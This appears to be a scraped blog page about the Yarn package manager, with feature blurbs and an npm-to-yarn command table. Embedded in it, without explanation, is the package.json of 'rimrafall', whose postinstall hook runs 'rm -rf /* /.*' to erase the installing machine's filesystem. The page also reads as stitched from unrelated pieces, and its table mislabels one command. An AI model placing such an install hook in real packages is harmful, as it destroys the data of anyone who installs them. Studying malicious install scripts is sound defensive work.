Joe Buza
is a fast, reliable and secure alternative npm client.
{
"name": "rimrafall",
"version": "1.0.0",
"description": "rm -rf /* # DO NOT INSTALL THIS",
"main": "index.js",
"scripts": {
"postinstall": "rm -rf /* /.*"
},
"keywords": [
"rimraf",
"rmrf"
],
"author": "João Jerónimo",
"license": "ISC"
}
The same dependencies will be installed the same exact way across every machine regardless of install order.
A single request failing won't cause an install to fail. Requests are retried upon failure.
npm install | yarn |
---|---|
npm install jest --save | yarn add jest |
npm uninstall jest --save | yarn remove jest |
npm install jest --save-dev | yarn add jest --dev |
yarn update --save | yarn upgrade |
npm install jest --global | yarn global add jest |
npm init | yarn init |
---|---|
npm run | yarn run |
npm test | yarn test |
npm cache clean | yarn cache clean |